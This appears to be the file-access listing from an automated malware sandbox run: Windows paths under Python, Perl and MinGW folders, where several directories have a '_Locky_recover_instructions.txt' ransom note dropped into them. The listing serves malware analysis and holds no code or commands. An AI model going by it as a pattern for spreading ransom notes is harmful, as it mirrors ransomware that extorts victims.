c:\Python27\tcl\tk8.5\demos\images<br />
c:\Python27\tcl\tk8.5\images\*<br />
c:\Python27\tcl\tk8.5\images<br />
c:\Python27\tcl\tk8.5\msgs\*<br />
c:\Python27\tcl\tk8.5\msgs<br />
c:\Python27\tcl\tk8.5\ttk\*<br />
c:\Python27\tcl\tk8.5\ttk<br />
c:\Python27\Tools\*<br />
c:\Python27\Tools<br />
c:\Python27\Tools\i18n\*<br />
c:\Python27\Tools\i18n<br />
c:\Python27\Tools\pynche\*<br />
c:\Python27\Tools\pynche<br />
c:\Python27\Tools\pynche\X\*<br />
c:\Python27\Tools\pynche\X<br />
c:\Python27\Tools\Scripts\*<br />
c:\Python27\Tools\Scripts<br />
c:\Python27\Tools\versioncheck\*<br />
c:\Python27\Tools\versioncheck<br />
c:\Python27\Tools\webchecker\*<br />
c:\Python27\Tools\webchecker<br />
c:\tjgzvka\*<br />
c:\tjgzvka<br />
c:\tjgzvka\bin\*<br />
c:\tjgzvka\bin<br />
c:\tjgzvka\dll\*<br />
c:\tjgzvka\dll<br />
c:\tjgzvka\lib\*<br />
c:\tjgzvka\lib<br />
c:\tjgzvka\lib\api\*<br />
c:\tjgzvka\lib\api<br />
c:\tjgzvka\lib\common\*<br />
c:\tjgzvka\lib\common<br />
c:\tjgzvka\lib\core\*<br />
c:\tjgzvka\lib\core<br />
c:\tjgzvka\modules\*<br />
c:\tjgzvka\modules<br />
c:\tjgzvka\modules\auxiliary\*<br />
c:\tjgzvka\modules\auxiliary<br />
c:\tjgzvka\modules\packages\*<br />
c:\tjgzvka\modules\packages<br />
c:\Python27\Lib\test\badcert.pem<br />
c:\Python27\Lib\test\_Locky_recover_instructions.txt<br />
c:\Python27\Lib\test\badkey.pem<br />
c:\Python27\Lib\test\https_svn_python_org_root.pem<br />
c:\Python27\Lib\test\keycert.pem<br />
c:\Python27\Lib\test\nullcert.pem<br />
c:\Python27\Lib\test\sha256.pem<br />
c:\Python27\Lib\test\ssl_cert.pem<br />
c:\Python27\Lib\test\ssl_key.pem<br />
c:\Python27\Lib\test\svn_python_org_https_cert.pem<br />
c:\Python27\Lib\test\wrongcert.pem<br />
c:\Perl\perl\lib\CORE\INTERN.h<br />
c:\Perl\perl\lib\CORE\_Locky_recover_instructions.txt<br />
c:\Perl\perl\lib\CORE\hv.h<br />
c:\Perl\perl\lib\CORE\handy.h<br />
c:\Perl\perl\lib\CORE\gv.h<br />
c:\Perl\perl\lib\CORE\git_version.h<br />
c:\Perl\perl\lib\CORE\form.h<br />
c:\Perl\perl\lib\CORE\fakethr.h<br />
c:\Perl\perl\lib\CORE\fakesdio.h<br />
c:\Perl\perl\lib\CORE\EXTERN.h<br />
c:\Perl\perl\lib\CORE\embedvar.h<br />
c:\Perl\perl\lib\CORE\embed.h<br />
c:\Perl\perl\lib\CORE\dosish.h<br />
c:\Perl\perl\lib\CORE\cop.h<br />
c:\Perl\perl\lib\CORE\config.h<br />
c:\Perl\perl\lib\CORE\cc_runtime.h<br />
c:\Perl\perl\lib\CORE\bitcount.h<br />
c:\Perl\perl\lib\CORE\av.h<br />
c:\Perl\c\i686-w64-mingw32\include\accctrl.h<br />
c:\Perl\c\i686-w64-mingw32\include\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\aclapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\aclui.h<br />
c:\Perl\c\i686-w64-mingw32\include\activeds.h<br />
c:\Perl\c\i686-w64-mingw32\include\activscp.h<br />
c:\Perl\c\i686-w64-mingw32\include\adc.h<br />
c:\Perl\c\i686-w64-mingw32\include\admex.h<br />
c:\Perl\c\i686-w64-mingw32\include\adoctint.h<br />
c:\Perl\c\i686-w64-mingw32\include\adodef.h<br />
c:\Perl\c\i686-w64-mingw32\include\adogpool.h<br />
c:\Perl\c\i686-w64-mingw32\include\adoguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\adoid.h<br />
c:\Perl\c\i686-w64-mingw32\include\adoint.h<br />
c:\Perl\c\i686-w64-mingw32\include\adojet.h<br />
c:\Perl\c\i686-w64-mingw32\include\adomd.h<br />
c:\Perl\c\i686-w64-mingw32\include\adptif.h<br />
c:\Perl\c\i686-w64-mingw32\include\adsdb.h<br />
c:\Perl\c\i686-w64-mingw32\include\adserr.h<br />
c:\Perl\c\i686-w64-mingw32\include\adshlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\adsiid.h<br />
c:\Perl\c\i686-w64-mingw32\include\adsnms.h<br />
c:\Perl\c\i686-w64-mingw32\include\adsprop.h<br />
c:\Perl\c\i686-w64-mingw32\include\adssts.h<br />
c:\Perl\c\i686-w64-mingw32\include\adtgen.h<br />
c:\Perl\c\i686-w64-mingw32\include\advpub.h<br />
c:\Perl\c\i686-w64-mingw32\include\afxres.h<br />
c:\Perl\c\i686-w64-mingw32\include\af_irda.h<br />
c:\Perl\c\i686-w64-mingw32\include\agtctl.h<br />
c:\Perl\c\i686-w64-mingw32\include\agtctl_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\agterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\agtsvr.h<br />
c:\Perl\c\i686-w64-mingw32\include\agtsvr_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\amaudio.h<br />
c:\Perl\c\i686-w64-mingw32\include\amstream.h<br />
c:\Perl\c\i686-w64-mingw32\include\amvideo.h<br />
c:\Perl\c\i686-w64-mingw32\include\appmgmt.h<br />
c:\Perl\c\i686-w64-mingw32\include\aqadmtyp.h<br />
c:\Perl\c\i686-w64-mingw32\include\asptlb.h<br />
c:\Perl\c\i686-w64-mingw32\include\assert.h<br />
c:\Perl\c\i686-w64-mingw32\include\atalkwsh.h<br />
c:\Perl\c\i686-w64-mingw32\include\audevcod.h<br />
c:\Perl\c\i686-w64-mingw32\include\authif.h<br />
c:\Perl\c\i686-w64-mingw32\include\authz.h<br />
c:\Perl\c\i686-w64-mingw32\include\avifmt.h<br />
c:\Perl\c\i686-w64-mingw32\include\azroles.h<br />
c:\Perl\c\i686-w64-mingw32\include\basetsd.h<br />
c:\Perl\c\i686-w64-mingw32\include\basetyps.h<br />
c:\Perl\c\i686-w64-mingw32\include\batclass.h<br />
c:\Perl\c\i686-w64-mingw32\include\bh.h<br />
c:\Perl\c\i686-w64-mingw32\include\bidispl.h<br />
c:\Perl\c\i686-w64-mingw32\include\bits.h<br />
c:\Perl\c\i686-w64-mingw32\include\bits1_5.h<br />
c:\Perl\c\i686-w64-mingw32\include\bits2_0.h<br />
c:\Perl\c\i686-w64-mingw32\include\bitscfg.h<br />
c:\Perl\c\i686-w64-mingw32\include\bitsmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\blberr.h<br />
c:\Perl\c\i686-w64-mingw32\include\callobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\cchannel.h<br />
c:\Perl\c\i686-w64-mingw32\include\cderr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoex.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoexerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoexm.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoexm_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\cdoexstr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdoex_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\cdonts.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdosys.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdosyserr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdosysstr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cdosys_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\celib.h<br />
c:\Perl\c\i686-w64-mingw32\include\certadm.h<br />
c:\Perl\c\i686-w64-mingw32\include\certbase.h<br />
c:\Perl\c\i686-w64-mingw32\include\certbcli.h<br />
c:\Perl\c\i686-w64-mingw32\include\certcli.h<br />
c:\Perl\c\i686-w64-mingw32\include\certenc.h<br />
c:\Perl\c\i686-w64-mingw32\include\certexit.h<br />
c:\Perl\c\i686-w64-mingw32\include\certif.h<br />
c:\Perl\c\i686-w64-mingw32\include\certmod.h<br />
c:\Perl\c\i686-w64-mingw32\include\certpol.h<br />
c:\Perl\c\i686-w64-mingw32\include\certreqd.h<br />
c:\Perl\c\i686-w64-mingw32\include\certsrv.h<br />
c:\Perl\c\i686-w64-mingw32\include\certview.h<br />
c:\Perl\c\i686-w64-mingw32\include\cfg.h<br />
c:\Perl\c\i686-w64-mingw32\include\cfgmgr32.h<br />
c:\Perl\c\i686-w64-mingw32\include\cguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\chanmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\cierror.h<br />
c:\Perl\c\i686-w64-mingw32\include\cluadmex.h<br />
c:\Perl\c\i686-w64-mingw32\include\clusapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\cluscfgguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\cluscfgserver.h<br />
c:\Perl\c\i686-w64-mingw32\include\cluscfgwizard.h<br />
c:\Perl\c\i686-w64-mingw32\include\cmdtree.h<br />
c:\Perl\c\i686-w64-mingw32\include\cmnquery.h<br />
c:\Perl\c\i686-w64-mingw32\include\colordlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\comadmin.h<br />
c:\Perl\c\i686-w64-mingw32\include\comcat.h<br />
c:\Perl\c\i686-w64-mingw32\include\comdef.h<br />
c:\Perl\c\i686-w64-mingw32\include\comdefsp.h<br />
c:\Perl\c\i686-w64-mingw32\include\comip.h<br />
c:\Perl\c\i686-w64-mingw32\include\commctrl.h<br />
c:\Perl\c\i686-w64-mingw32\include\commdlg.h<br />
c:\Perl\c\i686-w64-mingw32\include\commoncontrols.h<br />
c:\Perl\c\i686-w64-mingw32\include\complex.h<br />
c:\Perl\c\i686-w64-mingw32\include\compobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\comsvcs.h<br />
c:\Perl\c\i686-w64-mingw32\include\comutil.h<br />
c:\Perl\c\i686-w64-mingw32\include\confpriv.h<br />
c:\Perl\c\i686-w64-mingw32\include\conio.h<br />
c:\Perl\c\i686-w64-mingw32\include\control.h<br />
c:\Perl\c\i686-w64-mingw32\include\correg.h<br />
c:\Perl\c\i686-w64-mingw32\include\cpl.h<br />
c:\Perl\c\i686-w64-mingw32\include\cplext.h<br />
c:\Perl\c\i686-w64-mingw32\include\crtdbg.h<br />
c:\Perl\c\i686-w64-mingw32\include\crtdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\cryptuiapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ctxtcall.h<br />
c:\Perl\c\i686-w64-mingw32\include\ctype.h<br />
c:\Perl\c\i686-w64-mingw32\include\custcntl.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d8.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d8caps.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d8types.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d9.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d9caps.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3d9types.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dcaps.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dhal.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3drm.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3drmdef.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3drmobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dtypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx8core.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9core.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9math.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9mesh.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9shader.h<br />
c:\Perl\c\i686-w64-mingw32\include\d3dx9tex.h<br />
c:\Perl\c\i686-w64-mingw32\include\daogetrw.h<br />
c:\Perl\c\i686-w64-mingw32\include\datapath.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbdaoerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbdaoid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbdaoint.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbgautoattach.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbgeng.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbghelp.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbgprop.h<br />
c:\Perl\c\i686-w64-mingw32\include\dbt.h<br />
c:\Perl\c\i686-w64-mingw32\include\dciddi.h<br />
c:\Perl\c\i686-w64-mingw32\include\dciman.h<br />
c:\Perl\c\i686-w64-mingw32\include\dde.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddeml.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddraw.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddrawgdi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddrawi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ddstream.h<br />
c:\Perl\c\i686-w64-mingw32\include\delayimp.h<br />
c:\Perl\c\i686-w64-mingw32\include\devguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhcpcsdk.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhcpsapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhcpssdk.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhtmldid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhtmled.h<br />
c:\Perl\c\i686-w64-mingw32\include\dhtmliid.h<br />
c:\Perl\c\i686-w64-mingw32\include\digitalv.h<br />
c:\Perl\c\i686-w64-mingw32\include\dimm.h<br />
c:\Perl\c\i686-w64-mingw32\include\dinput.h<br />
c:\Perl\c\i686-w64-mingw32\include\dir.h<br />
c:\Perl\c\i686-w64-mingw32\include\direct.h<br />
c:\Perl\c\i686-w64-mingw32\include\dirent.h<br />
c:\Perl\c\i686-w64-mingw32\include\diskguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dispatch.h<br />
c:\Perl\c\i686-w64-mingw32\include\dispdib.h<br />
c:\Perl\c\i686-w64-mingw32\include\dispex.h<br />
c:\Perl\c\i686-w64-mingw32\include\dlcapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\dlfcn.h<br />
c:\Perl\c\i686-w64-mingw32\include\dlgs.h<br />
c:\Perl\c\i686-w64-mingw32\include\dls1.h<br />
c:\Perl\c\i686-w64-mingw32\include\dls2.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmdls.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmo.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmodshow.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmoreg.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmort.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmplugin.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusbuff.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusicc.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusicf.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusici.h<br />
c:\Perl\c\i686-w64-mingw32\include\dmusics.h<br />
c:\Perl\c\i686-w64-mingw32\include\docobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\domdid.h<br />
c:\Perl\c\i686-w64-mingw32\include\dos.h<br />
c:\Perl\c\i686-w64-mingw32\include\downloadmgr.h<br />
c:\Perl\c\i686-w64-mingw32\include\dpaddr.h<br />
c:\Perl\c\i686-w64-mingw32\include\dplay.h<br />
c:\Perl\c\i686-w64-mingw32\include\dplay8.h<br />
c:\Perl\c\i686-w64-mingw32\include\dplobby.h<br />
c:\Perl\c\i686-w64-mingw32\include\dplobby8.h<br />
c:\Perl\c\i686-w64-mingw32\include\dpnathlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsadmin.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsclient.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsconf.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsdriver.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsgetdc.h<br />
c:\Perl\c\i686-w64-mingw32\include\dshow.h<br />
c:\Perl\c\i686-w64-mingw32\include\dskquota.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsound.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsquery.h<br />
c:\Perl\c\i686-w64-mingw32\include\dsrole.h<br />
c:\Perl\c\i686-w64-mingw32\include\dtchelp.h<br />
c:\Perl\c\i686-w64-mingw32\include\dvdevcod.h<br />
c:\Perl\c\i686-w64-mingw32\include\dvdmedia.h<br />
c:\Perl\c\i686-w64-mingw32\include\dvec.h<br />
c:\Perl\c\i686-w64-mingw32\include\dvobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\dwmapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxdiag.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxerr8.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxerr9.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxfile.h<br />
c:\Perl\c\i686-w64-mingw32\include\dxtmpl.h<br />
c:\Perl\c\i686-w64-mingw32\include\edevdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\eh.h<br />
c:\Perl\c\i686-w64-mingw32\include\emostore.h<br />
c:\Perl\c\i686-w64-mingw32\include\emostore_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\emptyvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\errno.h<br />
c:\Perl\c\i686-w64-mingw32\include\error.h<br />
c:\Perl\c\i686-w64-mingw32\include\errorrep.h<br />
c:\Perl\c\i686-w64-mingw32\include\errors.h<br />
c:\Perl\c\i686-w64-mingw32\include\evcode.h<br />
c:\Perl\c\i686-w64-mingw32\include\eventsys.h<br />
c:\Perl\c\i686-w64-mingw32\include\evntrace.h<br />
c:\Perl\c\i686-w64-mingw32\include\exchform.h<br />
c:\Perl\c\i686-w64-mingw32\include\excpt.h<br />
c:\Perl\c\i686-w64-mingw32\include\exdisp.h<br />
c:\Perl\c\i686-w64-mingw32\include\exdispid.h<br />
c:\Perl\c\i686-w64-mingw32\include\fci.h<br />
c:\Perl\c\i686-w64-mingw32\include\fcntl.h<br />
c:\Perl\c\i686-w64-mingw32\include\fdi.h<br />
c:\Perl\c\i686-w64-mingw32\include\fenv.h<br />
c:\Perl\c\i686-w64-mingw32\include\filehc.h<br />
c:\Perl\c\i686-w64-mingw32\include\filter.h<br />
c:\Perl\c\i686-w64-mingw32\include\filterr.h<br />
c:\Perl\c\i686-w64-mingw32\include\float.h<br />
c:\Perl\c\i686-w64-mingw32\include\fltdefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\fpieee.h<br />
c:\Perl\c\i686-w64-mingw32\include\ftsiface.h<br />
c:\Perl\c\i686-w64-mingw32\include\fvec.h<br />
c:\Perl\c\i686-w64-mingw32\include\gb18030.h<br />
c:\Perl\c\i686-w64-mingw32\include\getopt.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\gl.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\_Locky_recover_instructions.txt<br />
c:\Perl\c\i686-w64-mingw32\include\GL\glaux.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\glext.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\glu.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\glxext.h<br />
c:\Perl\c\i686-w64-mingw32\include\GL\wglext.h<br />
c:\Perl\c\i686-w64-mingw32\include\gpedit.h<br />
c:\Perl\c\i686-w64-mingw32\include\gpmgmt.h<br />
c:\Perl\c\i686-w64-mingw32\include\guiddef.h<br />
c:\Perl\c\i686-w64-mingw32\include\h323priv.h<br />
c:\Perl\c\i686-w64-mingw32\include\hlguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\hliface.h<br />
c:\Perl\c\i686-w64-mingw32\include\hlink.h<br />
c:\Perl\c\i686-w64-mingw32\include\hostinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\htiface.h<br />
c:\Perl\c\i686-w64-mingw32\include\htiframe.h<br />
c:\Perl\c\i686-w64-mingw32\include\htmlguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\htmlhelp.h<br />
c:\Perl\c\i686-w64-mingw32\include\http.h<br />
c:\Perl\c\i686-w64-mingw32\include\httpext.h<br />
c:\Perl\c\i686-w64-mingw32\include\httpfilt.h<br />
c:\Perl\c\i686-w64-mingw32\include\httprequestid.h<br />
c:\Perl\c\i686-w64-mingw32\include\ia64reg.h<br />
c:\Perl\c\i686-w64-mingw32\include\iaccess.h<br />
c:\Perl\c\i686-w64-mingw32\include\iadmext.h<br />
c:\Perl\c\i686-w64-mingw32\include\iadmw.h<br />
c:\Perl\c\i686-w64-mingw32\include\iads.h<br />
c:\Perl\c\i686-w64-mingw32\include\icm.h<br />
c:\Perl\c\i686-w64-mingw32\include\icmpapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\icrsint.h<br />
c:\Perl\c\i686-w64-mingw32\include\idf.h<br />
c:\Perl\c\i686-w64-mingw32\include\idispids.h<br />
c:\Perl\c\i686-w64-mingw32\include\iedial.h<br />
c:\Perl\c\i686-w64-mingw32\include\ieeefp.h<br />
c:\Perl\c\i686-w64-mingw32\include\ieverp.h<br />
c:\Perl\c\i686-w64-mingw32\include\iiis.h<br />
c:\Perl\c\i686-w64-mingw32\include\iiisext.h<br />
c:\Perl\c\i686-w64-mingw32\include\iimgctx.h<br />
c:\Perl\c\i686-w64-mingw32\include\iiscnfg.h<br />
c:\Perl\c\i686-w64-mingw32\include\iisext_i.c<br />
c:\Perl\c\i686-w64-mingw32\include\iisrsta.h<br />
c:\Perl\c\i686-w64-mingw32\include\imagehlp.h<br />
c:\Perl\c\i686-w64-mingw32\include\ime.h<br />
c:\Perl\c\i686-w64-mingw32\include\imessage.h<br />
c:\Perl\c\i686-w64-mingw32\include\imm.h<br />
c:\Perl\c\i686-w64-mingw32\include\indexsrv.h<br />
c:\Perl\c\i686-w64-mingw32\include\inetreg.h<br />
c:\Perl\c\i686-w64-mingw32\include\inetsdk.h<br />
c:\Perl\c\i686-w64-mingw32\include\initguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\initoid.h<br />
c:\Perl\c\i686-w64-mingw32\include\inputscope.h<br />
c:\Perl\c\i686-w64-mingw32\include\intrin.h<br />
c:\Perl\c\i686-w64-mingw32\include\intshcut.h<br />
c:\Perl\c\i686-w64-mingw32\include\inttypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\invkprxy.h<br />
c:\Perl\c\i686-w64-mingw32\include\io.h<br />
c:\Perl\c\i686-w64-mingw32\include\ioevent.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipexport.h<br />
c:\Perl\c\i686-w64-mingw32\include\iphlpapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipifcons.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipinfoid.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipmsp.h<br />
c:\Perl\c\i686-w64-mingw32\include\iprtrmib.h<br />
c:\Perl\c\i686-w64-mingw32\include\iptypes.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxconst.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxrip.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxrtdef.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxsap.h<br />
c:\Perl\c\i686-w64-mingw32\include\ipxtfflt.h<br />
c:\Perl\c\i686-w64-mingw32\include\isguids.h<br />
c:\Perl\c\i686-w64-mingw32\include\issper16.h<br />
c:\Perl\c\i686-w64-mingw32\include\issperr.h<br />
c:\Perl\c\i686-w64-mingw32\include\iwamreg.h<br />
c:\Perl\c\i686-w64-mingw32\include\i_cryptasn1tls.h<br />
c:\Perl\c\i686-w64-mingw32\include\sspguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\ksguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\ksmedia.h<br />
c:\Perl\c\i686-w64-mingw32\include\ksproxy.h<br />
c:\Perl\c\i686-w64-mingw32\include\ksuuids.h<br />
c:\Perl\c\i686-w64-mingw32\include\kxia64.h<br />
c:\Perl\c\i686-w64-mingw32\include\libgen.h<br />
c:\Perl\c\i686-w64-mingw32\include\limits.h<br />
c:\Perl\c\i686-w64-mingw32\include\lm.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmaccess.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmalert.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmapibuf.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmat.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmaudit.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmconfig.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmcons.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmdfs.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmerrlog.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmjoin.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmremutl.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmrepl.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmserver.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmshare.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmsname.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmstats.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmsvc.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmuse.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmuseflg.h<br />
c:\Perl\c\i686-w64-mingw32\include\lmwksta.h<br />
c:\Perl\c\i686-w64-mingw32\include\loadperf.h<br />
c:\Perl\c\i686-w64-mingw32\include\locale.h<br />
c:\Perl\c\i686-w64-mingw32\include\lpmapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\lzexpand.h<br />
c:\Perl\c\i686-w64-mingw32\include\madcapcl.h<br />
c:\Perl\c\i686-w64-mingw32\include\mailmsgprops.h<br />
c:\Perl\c\i686-w64-mingw32\include\malloc.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapicode.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapidbg.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapidefs.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiform.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiguid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapihook.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapinls.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapioid.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapispi.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapitags.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiutil.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapival.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiwin.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapiwz.h<br />
c:\Perl\c\i686-w64-mingw32\include\mapix.h<br />
c:\Perl\c\i686-w64-mingw32\include\math.h<br />
c:\Perl\c\i686-w64-mingw32\include\mbctype.h<br />
c:\Perl\c\i686-w64-mingw32\include\mbstring.h<br />
c:\Perl\c\i686-w64-mingw32\include\mciavi.h<br />
c:\Perl\c\i686-w64-mingw32\include\mcx.h<br />
c:\Perl\c\i686-w64-mingw32\include\mdcommsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\mddefw.h<br />
c:\Perl\c\i686-w64-mingw32\include\mdhcp.h<br />
c:\Perl\c\i686-w64-mingw32\include\mdmsg.h<br />
c:\Perl\c\i686-w64-mingw32\include\mediaerr.h<br />
c:\Perl\c\i686-w64-mingw32\include\mediaobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\medparam.h<br />
c:\Perl\c\i686-w64-mingw32\include\mem.h<br />
c:\Perl\c\i686-w64-mingw32\include\memory.h<br />
c:\Perl\c\i686-w64-mingw32\include\mergemod.h<br />
c:\Perl\c\i686-w64-mingw32\include\mgm.h<br />
c:\Perl\c\i686-w64-mingw32\include\mgmtapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\midles.h<br />
c:\Perl\c\i686-w64-mingw32\include\mimedisp.h<br />
c:\Perl\c\i686-w64-mingw32\include\mimeinfo.h<br />
c:\Perl\c\i686-w64-mingw32\include\minmax.h<br />
c:\Perl\c\i686-w64-mingw32\include\mlang.h<br />
c:\Perl\c\i686-w64-mingw32\include\mmc.h<br />
c:\Perl\c\i686-w64-mingw32\include\mmcobj.h<br />
c:\Perl\c\i686-w64-mingw32\include\mmreg.h<br />
c:\Perl\c\i686-w64-mingw32\include\mmsystem.h<br />
c:\Perl\c\i686-w64-mingw32\include\mobsync.h<br />
c:\Perl\c\i686-w64-mingw32\include\moniker.h<br />
c:\Perl\c\i686-w64-mingw32\include\mprapi.h<br />
c:\Perl\c\i686-w64-mingw32\include\mprerror.h<br />
c:\Perl\c\i686-w64-mingw32\include\mq.h<br />
c:\Perl\c\i686-w64-mingw32\include\mqmail.h<br />
